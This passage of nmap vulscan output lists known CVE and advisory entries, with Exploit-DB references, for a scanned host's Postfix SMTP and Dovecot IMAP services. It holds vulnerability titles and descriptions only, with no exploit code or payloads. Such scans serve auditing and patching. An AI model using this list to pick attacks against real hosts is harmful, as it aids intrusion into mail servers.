12781| [CVE-2009-2939] The postfix.postinst script in the Debian GNU/Linux and Ubuntu postfix 2.5.5 package grants the postfix user write access to /var/spool/postfix/pid, which might allow local users to conduct symlink attacks that overwrite arbitrary files.
12782| [CVE-2008-4977] ** DISPUTED ** postfix_groups.pl in Postfix 2.5.2 allows local users to overwrite arbitrary files via a symlink attack on the (1) /tmp/postfix_groups.stdout, (2) /tmp/postfix_groups.stderr, and (3) /tmp/postfix_groups.message temporary files. NOTE: the vendor disputes this vulnerability, stating "This is not a real issue ... users would have to edit a script under /usr/lib to enable it."
12783| [CVE-2008-3889] Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 before 2.6-20080902, when used with the Linux 2.6 kernel, leaks epoll file descriptors during execution of "non-Postfix" commands, which allows local users to cause a denial of service (application slowdown or exit) via a crafted command, as demonstrated by a command in a .forward file.
12784| [CVE-2008-3646] The Postfix configuration file in Mac OS X 10.5.5 causes Postfix to be network-accessible when mail is sent from a local command-line tool, which allows remote attackers to send mail to local Mac OS X users.
12785| [CVE-2008-2937] Postfix 2.5 before 2.5.4 and 2.6 before 2.6-20080814 delivers to a mailbox file even when this file is not owned by the recipient, which allows local users to read e-mail messages by creating a mailbox file corresponding to another user's account name.
12786| [CVE-2008-2936] Postfix before 2.3.15, 2.4 before 2.4.8, 2.5 before 2.5.4, and 2.6 before 2.6-20080814, when the operating system supports hard links to symlinks, allows local users to append e-mail messages to a file to which a root-owned symlink points, by creating a hard link to this symlink and then sending a message. NOTE: this can be leveraged to gain privileges if there is a symlink to an init script.
12787| [CVE-2007-3791] Buffer overflow in the w_read function in sockets.c in Cami Sardinha and Nigel Kukard policyd before 1.81 for Postfix allows remote attackers to cause a denial of service and possibly execute arbitrary code via long SMTP commands. NOTE: some of these details are obtained from third party information.
12788| [CVE-2006-0213] Kolab Server 2.0.1, 2.0.2 and development versions pre-2.1-20051215 and earlier, when authenticating users via secure SMTP, stores authentication credentials in plaintext in the postfix.log file, which allows local users to gain privileges.
12789| [CVE-2005-1127] Format string vulnerability in the log function in Net::Server 0.87 and earlier, as used in Postfix Greylisting Policy Server (Postgrey) 1.18 and earlier, and possibly other products, allows remote attackers to cause a denial of service (crash) via format string specifiers that are not properly handled before being sent to syslog, as demonstrated using sender addresses to Postgrey.
12790| [CVE-2005-0337] Postfix 2.1.3, when /proc/net/if_inet6 is not available and permit_mx_backup is enabled in smtpd_recipient_restrictions, allows remote attackers to bypass e-mail restrictions and perform mail relaying by sending mail to an IPv6 hostname.
12791| [CVE-2004-1113] SQL injection vulnerability in SQLgrey Postfix greylisting service before 1.2.0 allows remote attackers to execute arbitrary SQL commands via the (1) sender or (2) recipient e-mail addresses.
12792| [CVE-2004-1088] Postfix server for Apple Mac OS X 10.3.6, when using CRAM-MD5, allows remote attackers to send mail without authentication by replaying authentication information.
12793| [CVE-2004-0925] Postfix on Mac OS X 10.3.x through 10.3.5, with SMTPD AUTH enabled, does not properly clear the username between authentication attempts, which allows users with the longest username to prevent other valid users from being able to authenticate.
12794| [CVE-2003-0540] The address parser code in Postfix 1.1.12 and earlier allows remote attackers to cause a denial of service (lock) via (1) a malformed envelope address to a local host that would generate a bounce and contains the ".!" string in the MAIL FROM or Errors-To headers, which causes nqmgr to lock up, or (2) via a valid MAIL FROM with a RCPT TO containing a ".!" string, which causes an instance of the SMTP listener to lock up.
12795| [CVE-2003-0468] Postfix 1.1.11 and earlier allows remote attackers to use Postfix to conduct "bounce scans" or DDos attacks of other hosts via an email address to the local host containing the target IP address and service name followed by a "!" string, which causes Postfix to attempt to use SMTP to communicate with the target on the associated port.
12796| [CVE-2001-0894] Vulnerability in Postfix SMTP server before 20010228-pl07, when configured to email the postmaster when SMTP errors cause the session to terminate, allows remote attackers to cause a denial of service (memory exhaustion) by generating a large number of SMTP errors, which forces the SMTP session log to grow too large.
12797|
12798| SecurityFocus - https://www.securityfocus.com/bid/:
12799| [96142] PostfixAdmin CVE-2017-5930 Session Management Security Bypass Vulnerability
12800| [90814] Postfix Admin Multiple Cross Site Request Forgery Vulnerabilities
12801| [67250] Postfix Arbitrary Content Security Bypass Vulnerability
12802| [66455] Postfix Admin 'functions.inc.php' SQL Injection Vulnerability
12803| [65184] Fail2ban Postfix Filter Remote Denial of Service Vulnerability
12804| [51680] Postfix Admin Multiple SQL Injection and Cross Site Scripting Vulnerabilities
12805| [47778] Postfix SMTP Server Cyrus SASL Support Memory Corruption Vulnerability
12806| [36469] Debian and Ubuntu Postfix Insecure Temporary File Creation Vulnerability
12807| [31721] Apple Mac OS X 10.5 Postfix Security Bypass Vulnerability
12808| [30977] Postfix 'epoll' Linux Event Handler Local Denial of Service Vulnerability
12809| [30691] Postfix Local Information Disclosure and Local Privilege Escalation Vulnerabilities
12810| [13133] Salim Gasmi GLD Postfix Greylisting Daemon Format String Vulnerability
12811| [13129] Salim Gasmi GLD Postfix Greylisting Daemon Buffer Overflow Vulnerability
12812| [12445] Postfix IPv6 Unauthorized Mail Relay Vulnerability
12813| [11898] SQLgrey Postfix Greylisting Service Unspecified SQL Injection Vulnerability
12814| [11633] SQLgrey Postfix Greylisting Service SQL Injection Vulnerability
12815| [11323] Apple Mac OS X Postfix Release SMTPD AUTH Username Denial Of Service Vulnerability
12816| [8362] Postfix SMTP Malformed E-mail Envelope Address Denial of Service Vulnerability
12817| [8361] Postfix Connection Proxying Vulnerability
12818| [8333] Multiple Postfix Denial of Service Vulnerabilities
12819| [3638] SuSEConfig.postfix chroot Local DoS Attack Vulnerability
12820| [3637] SuSEConfig.postfix chroot File Ownership Vulnerability
12821| [3544] Postfix SMTP Log Denial Of Service Vulnerability
12822| [1428] cyrus With postfix and Procmail Remote Shell Expansion Vulnerabilities
12823|
12824| IBM X-Force - https://exchange.xforce.ibmcloud.com:
12825| [72752] Postfix Admin multiple parameters SQL injection
12826| [72751] PostfixAdmin multiple parameters cross-site scripting
12827| [67359] Postfix Cyrus SASL library in the SMTP server code execution
12828| [55970] SUSE Linux Enterprise postfix security bypass
12829| [53425] Postfix in Debian and Ubuntu pid symlink
12830| [45876] Apple Mac OS X Postfix configuration file weak security
12831| [44865] Postfix file descriptor denial of service
12832| [44461] Postfix email information disclosure
12833| [44460] Postfix symlink code execution
12834| [22655] RHSA-2005:152 updates for postfix not installed
12835| [19218] Postfix IPv6 mail relay
12836| [18435] SQLgrey Postfix greylisting service SQL injection
12837| [18353] Postfix CRAM-MD5 authentication replay attack
12838| [17998] SQLgrey Postfix greylisting service SQL injection
12839| [17595] Apple Mac OS postfix SMTPD AUTH denial of service
12840| [12816] Postfix MAIL FROM or RCPT TO denial of service
12841| [12815] Postfix could be used as a distributed denial of service tool
12842| [7568] Postfix SMTP log denial of service
12843| [4905] Cyrus with postfix and procmail integration could allow remote command execution
12844|
12845| Exploit-DB - https://www.exploit-db.com:
12846| [25392] Salim Gasmi GLD 1.x Postfix Greylisting Daemon Buffer Overflow Vulnerability
12847| [22982] Postfix 1.1.x Denial of Service Vulnerabilities (2)
12848| [22981] Postfix 1.1.x Denial of Service Vulnerabilities (1)
12849| [16841] GLD (Greylisting Daemon) Postfix Buffer Overflow
12850| [10023] Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow
12851| [6472] Postfix < 2.4.9, 2.5.5, 2.6-20080902 - (.forward) Local DoS Exploit
12852| [6337] Postfix <= 2.6-20080814 - (symlink) Local Privilege Escalation Exploit
12853| [934] gld 1.4 (Postfix Greylisting Daemon) Remote Format String Exploit
12854|
12855| OpenVAS (Nessus) - http://www.openvas.org:
12856| [902517] Postfix SMTP Server Cyrus SASL Support Memory Corruption Vulnerability
12857| [881389] CentOS Update for postfix CESA-2011:0422 centos5 x86_64
12858| [881293] CentOS Update for postfix CESA-2011:0843 centos4 x86_64
12859| [881278] CentOS Update for postfix CESA-2011:0422 centos4 x86_64
12860| [881267] CentOS Update for postfix CESA-2011:0843 centos5 x86_64
12861| [880520] CentOS Update for postfix CESA-2011:0422 centos5 i386
12862| [880509] CentOS Update for postfix CESA-2011:0843 centos5 i386
12863| [880488] CentOS Update for postfix CESA-2011:0843 centos4 i386
12864| [880485] CentOS Update for postfix CESA-2011:0422 centos4 i386
12865| [880268] CentOS Update for postfix CESA-2008:0839 centos3 i386
12866| [880023] CentOS Update for postfix CESA-2008:0839 centos3 x86_64
12867| [870658] RedHat Update for postfix RHSA-2011:0423-01
12868| [870440] RedHat Update for postfix RHSA-2011:0843-01
12869| [870418] RedHat Update for postfix RHSA-2011:0422-01
12870| [870021] RedHat Update for postfix RHSA-2008:0839-01
12871| [863100] Fedora Update for postfix FEDORA-2011-6777
12872| [863097] Fedora Update for postfix FEDORA-2011-6771
12873| [862950] Fedora Update for postfix FEDORA-2011-3394
12874| [862938] Fedora Update for postfix FEDORA-2011-3355
12875| [860510] Fedora Update for postfix FEDORA-2008-8593
12876| [860419] Fedora Update for postfix FEDORA-2008-8595
12877| [850126] SuSE Update for postfix SUSE-SA:2010:011
12878| [850031] SuSE Update for postfix SUSE-SA:2008:040
12879| [840658] Ubuntu Update for postfix USN-1131-1
12880| [840648] Ubuntu Update for postfix USN-1113-1
12881| [840227] Ubuntu Update for postfix vulnerabilities USN-642-1
12882| [840190] Ubuntu Update for postfix vulnerability USN-636-1
12883| [831400] Mandriva Update for postfix MDVSA-2011:090 (postfix)
12884| [830713] Mandriva Update for postfix MDVSA-2008:171 (postfix)
12885| [830635] Mandriva Update for postfix MDVSA-2008:190 (postfix)
12886| [830075] Mandriva Update for postfix MDKA-2007:079 (postfix)
12887| [72452] Gentoo Security Advisory GLSA 201209-18 (postfixadmin)
12888| [71559] Gentoo Security Advisory GLSA 201206-33 (Postfix)
12889| [70744] FreeBSD Ports: postfixadmin
12890| [69770] FreeBSD Ports: postfix, postfix-base
12891| [69733] Debian Security Advisory DSA 2233-1 (postfix)
12892| [69363] FreeBSD Ports: postfix, postfix-base
12893| [66394] Mandriva Security Advisory MDVSA-2009:224-1 (postfix)
12894| [65957] SLES10: Security update for Postfix
12895| [65911] SLES10: Security update for Postfix
12896| [65353] SLES9: Security update for Postfix
12897| [65350] SLES9: Security update for postfix
12898| [64696] Mandrake Security Advisory MDVSA-2009:224 (postfix)
12899| [61646] Gentoo Security Advisory GLSA 200809-09 (postfix)
12900| [61445] Gentoo Security Advisory GLSA 200808-12 (postfix)
12901| [61435] Debian Security Advisory DSA 1629-2 (postfix)
12902| [61434] Debian Security Advisory DSA 1629-1 (postfix)
12903| [60836] FreeBSD Ports: postfix-policyd-weight
12904| [58580] Debian Security Advisory DSA 1361-1 (postfix-policyd)
12905| [53833] Debian Security Advisory DSA 093-1 (postfix)
12906| [53652] Debian Security Advisory DSA 363-1 (postfix)
12907|
12908| SecurityTracker - https://www.securitytracker.com:
12909| [1025521] Postfix SASL Authentication Heap Overflow Lets Remote Users Deny Service
12910| [1025179] Postfix Plaintext to TLS Switching Error Lets Remote Users Inject Plaintext Commands
12911| [1020800] Postfix Linux epoll File Descriptor Leak Lets Local Users Deny Service
12912| [1020700] Postfix Symlink Dereference Bug Lets Local Users Gain Elevated Privileges
12913| [1012395] Postfix CRAM-MD5 Replay Attack May Let Remote Users Send Mail
12914| [1011532] Postfix Buffer Error May Prevent Remote Users from Being Able to Authenticate Using SMTPD AUTH
12915| [1007382] Postfix Bounce Messages Let Remote Users Scan for Open Ports on Other Hosts
12916| [1007381] Postfix Address Resolver Parsing Bug Lets Remote Users Hang the System
12917| [1002756] Postfix Mail Server Can Be Crashed By Remote Users Initiating Unsuccessful Sessions
12918|
12919| OSVDB - http://www.osvdb.org:
12920| [94034] Linux Kernel Broadcom B43 Wireless Driver b43_request_firmware Function fwpostfix modprobe Parameter Format String Local Privilege Escalation
12921| [78567] Postfix Admin backup.php Unspecified SQL Injection
12922| [78566] Postfix Admin functions.inc.php pacrypt() Function Unspecified SQL Injection
12923| [78565] Postfix Admin create-domain.php Unspecified SQL Injection
12924| [78564] Postfix Admin Unspecified XSS
12925| [78563] Postfix Admin edit-alias.php Unspecified XSS
12926| [78562] Postfix Admin create-alias.php Unspecified XSS
12927| [78561] Postfix Admin create-domain.php Unspecified XSS
12928| [78560] Postfix Admin templates/edit-vacation.php domain Parameter XSS
12929| [78559] Postfix Admin templates/menu.php domain Parameter XSS
12930| [72259] Postfix SMTP Cyrus SASL Authentication Context Data Reuse Memory Corruption
12931| [71021] Postfix STARTTLS Arbitrary Plaintext Command Injection
12932| [68340] Artica postfix.events.php Unrestricted Access Information Disclosure
12933| [61983] SUSE Linux postfix Network Interface Remote Access Restriction Bypass
12934| [58325] Debian GNU/Linux postfix postfix.postinst Symlink Arbitrary File Overwrite
12935| [49634] Postfix postfix_groups.pl Multiple Temporary File Symlink Arbitrary File Overwrite
12936| [48973] Apple Mac OS X Postfix Network Access Configuration Weakness
12937| [48108] Postfix epoll File Descriptor Leak Local DoS
12938| [47659] Postfix Cross-user Filename Local Mail Interception
12939| [47658] Postfix Hardlink to Symlink Mailspool Arbitrary Content Append
12940| [43888] policyd-weight for Postfix Socket Handling Unspecified Arbitrary File Manipulation
12941| [38091] policyd for Postfix sockets.c read_w() Function SMTP Command Remote Overflow
12942| [22381] Kolab Server Secure SMTP postfix.log Authentication Credential Disclosure
12943| [13470] Postfix IPv6 Patch if_inet6 Failure Arbitrary Mail Relay
12944| [12339] SQLgrey Postfix greylisting service Unspecified SQL Injection
12945| [12200] Apple Mac OS X Postfix CRAM-MD5 Replay Credentials
12946| [11571] SQLgrey Postfix greylisting Email Address SQL Injection
12947| [10545] Postfix Multiple Mail Header SMTP listener DoS
12948| [10544] Postfix Malformed Envelope Address nqmgr DoS
12949| [10500] Apple Mac OS X Postfix SMTPD AUTH Username Overflow DoS
12950| [6551] Postfix Bounce Scan / Packet Amplification DDoS
12951| [1991] Postfix SMTP Log DoS
12952|_
12953993/tcp open ssl/imap Dovecot imapd
12954| vulscan: VulDB - https://vuldb.com:
12955| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
12956| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
12957| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
12958| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
12959| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
12960| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
12961| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
12962| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
12963| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
12964| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
12965| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
12966| [69835] Dovecot 2.2.0/2.2.1 denial of service
12967| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
12968| [65684] Dovecot up to 2.2.6 unknown vulnerability
12969| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
12970| [63692] Dovecot up to 2.0.15 spoofing
12971| [7062] Dovecot 2.1.10 mail-search.c denial of service
12972| [59792] Cyrus IMAPd 2.4.11 weak authentication
12973| [57517] Dovecot up to 2.0.12 Login directory traversal
12974| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
12975| [57515] Dovecot up to 2.0.12 Crash denial of service
12976| [54944] Dovecot up to 1.2.14 denial of service
12977| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
12978| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
12979| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
12980| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
12981| [53277] Dovecot up to 1.2.10 denial of service
12982| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
12983| [45256] Dovecot up to 1.1.5 directory traversal
12984| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
12985| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
12986| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
12987| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
12988| [40356] Dovecot 1.0.9 Cache unknown vulnerability
12989| [38222] Dovecot 1.0.2 directory traversal
12990| [37927] Ipswitch Ipswitch Collaboration Suite up to 2006.1 IMAP Service imapd32.exe memory corruption
12991| [36376] Dovecot up to 1.0.x directory traversal
12992| [35759] Atrium MERCUR IMAPD IMAP4 mcrimap4.exe memory corruption
12993| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
12994|
12995| MITRE CVE - https://cve.mitre.org:
12996| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
12997| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
12998| [CVE-2011-3481] The index_get_ids function in index.c in imapd in Cyrus IMAP Server before 2.4.11, when server-side threading is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted References header in an e-mail message.
12999| [CVE-2011-3372] imap/nntpd.c in the NNTP server (nntpd) for Cyrus IMAPd 2.4.x before 2.4.12 allows remote attackers to bypass authentication by sending an AUTHINFO USER command without sending an additional AUTHINFO PASS command.
13000| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
13001| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
13002| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
13003| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
13004| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
13005| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
13006| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
13007| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
13008| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
13009| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
13010| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
13011| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
13012| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
13013| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
13014| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
13015| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
13016| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
13017| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
13018| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
13019| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
13020| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
13021| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
13022| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
13023| [CVE-2007-5740] The format string protection mechanism in IMAPD for Perdition Mail Retrieval Proxy 1.17 and earlier allows remote attackers to execute arbitrary code via an IMAP tag with a null byte followed by a format string specifier, which is not counted by the mechanism.
13024| [CVE-2007-5018] Stack-based buffer overflow in IMAPD in Mercury/32 4.52 allows remote authenticated users to execute arbitrary code via a long argument in a SEARCH ON command. NOTE: this issue might overlap with CVE-2004-1211.
13025| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
13026| [CVE-2007-3925] Multiple buffer overflows in the IMAP service (imapd32.exe) in Ipswitch IMail Server 2006 before 2006.21 allow remote authenticated users to execute arbitrary code via the (1) Search or (2) Search Charset command.
13027| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
13028| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
13029| [CVE-2007-1579] Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.
13030| [CVE-2007-1578] Multiple integer signedness errors in the NTLM implementation in Atrium MERCUR IMAPD (mcrimap4.exe) 5.00.14, with SP4, allow remote attackers to execute arbitrary code via a long NTLMSSP argument that triggers a stack-based buffer overflow.
13031| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
13032| [CVE-2006-6762] The IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to cause a denial of service via an APPEND command with a single "(" (parenthesis) in the argument.
13033| [CVE-2006-6761] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via a long argument to the SUBSCRIBE command.
13034| [CVE-2006-6425] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via unspecified vectors involving the APPEND command.
13035| [CVE-2006-6424] Multiple buffer overflows in Novell NetMail before 3.52e FTF2 allow remote attackers to execute arbitrary code (1) by appending literals to certain IMAP verbs when specifying command continuation requests to IMAPD, resulting in a heap overflow
13036| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
13037| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
13038| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
13039| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
13040| [CVE-2005-2278] Stack-based buffer overflow in the IMAP daemon (imapd) in MailEnable Professional 1.54 allows remote authenticated users to execute arbitrary code via the status command with a long mailbox name.
13041| [CVE-2005-1256] Stack-based buffer overflow in the IMAP daemon (IMAPD32.EXE) in IMail 8.13 in Ipswitch Collaboration Suite (ICS), and other versions before IMail Server 8.2 Hotfix 2, allows remote authenticated users to execute arbitrary code via a STATUS command with a long mailbox name.
13042| [CVE-2005-1249] The IMAP daemon (IMAPD32.EXE) in Ipswitch Collaboration Suite (ICS) allows remote attackers to cause a denial of service (CPU consumption) via an LSUB command with a large number of null characters, which causes an infinite loop.
13043| [CVE-2005-1015] Buffer overflow in MailEnable Imapd (MEIMAP.exe) allows remote attackers to execute arbitrary code via a long LOGIN command.
13044| [CVE-2005-0546] Multiple buffer overflows in Cyrus IMAPd before 2.2.11 may allow attackers to execute arbitrary code via (1) an off-by-one error in the imapd annotate extension, (2) an off-by-one error in "cached header handling," (3) a stack-based buffer overflow in fetchnews, or (4) a stack-based buffer overflow in imapd.
13045| [CVE-2003-1322] Multiple stack-based buffer overflows in Atrium MERCUR IMAPD in MERCUR Mailserver before 4.2.15.0 allow remote attackers to execute arbitrary code via a long (1) EXAMINE, (2) DELETE, (3) SUBSCRIBE, (4) RENAME, (5) UNSUBSCRIBE, (6) LIST, (7) LSUB, (8) STATUS, (9) LOGIN, (10) CREATE, or (11) SELECT command.
13046| [CVE-2002-1782] The default configuration of University of Washington IMAP daemon (wu-imapd), when running on a system that does not allow shell access, allows a local user with a valid IMAP account to read arbitrary files as that user.
13047| [CVE-2002-1604] Multiple buffer overflows in HP Tru64 UNIX allow local and possibly remote attackers to execute arbitrary code via a long NLSPATH environment variable to (1) csh, (2) dtsession, (3) dxsysinfo, (4) imapd, (5) inc, (6) uucp, (7) uux, (8) rdist, or (9) deliver.
13048| [CVE-2002-0997] Buffer overflows in IMAP Agent (imapd) for Novell NetMail (NIMS) 3.0.3 before 3.0.3A allows remote attackers to cause a denial of service.
13049| [CVE-2002-0379] Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.
13050| [CVE-2001-0691] Buffer overflows in Washington University imapd 2000a through 2000c could allow local users without shell access to execute code as themselves in certain configurations.
13051| [CVE-2000-0284] Buffer overflow in University of Washington imapd version 4.7 allows users with a valid account to execute commands via LIST or other commands.
13052| [CVE-1999-1557] Buffer overflow in the login functions in IMAP server (imapd) in Ipswitch IMail 5.0 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long user name or (2) a long password.
13053| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
13054| [CVE-1999-1224] IMAP 4.1 BETA, and possibly other versions, does not properly handle the SIGABRT (abort) signal, which allows local users to crash the server (imapd) via certain sequences of commands, which causes a core dump that may contain sensitive password information.
13055|
